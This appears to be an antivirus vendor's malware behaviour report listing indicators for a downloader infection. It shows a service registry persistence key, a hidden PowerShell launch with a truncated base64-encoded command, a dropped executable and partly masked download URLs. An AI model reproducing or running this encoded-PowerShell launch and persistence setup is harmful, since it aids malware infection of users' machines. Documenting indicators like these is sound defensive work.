Technical Information
- [<HKLM>\System\CurrentControlSet\Services\junositerate] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\junositerate] 'ImagePath' = '"%WINDIR%\SysWOW64\junositerate.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -enco JABCAGgAbAByAHQAdQBxAGoAcAB5AD0AJwBJAGEAcgBqAHoAZwBhAHAAeABpAHQAaABwACcAOwAkAEsAYwBxAG4AegBwAGMAbABnAGUAIAA9ACAAJwAyADUAMQAnADsAJABYAGQAdgBnAHAAZABmAHoAdwBlAGQAPQAnAFI...
- %HOMEPATH%\251.exe
- from %HOMEPATH%\251.exe to %WINDIR%\syswow64\junositerate.exe
- http://su#####lsupplies.com/wp-content/63689260/
- http://17#.##0.31.177:8080/pdf/results/ringin/merge/ via 17#.#30.31.177
- DNS ASK su#####lsupplies.com
- '%HOMEPATH%\251.exe'
- '%WINDIR%\syswow64\junositerate.exe'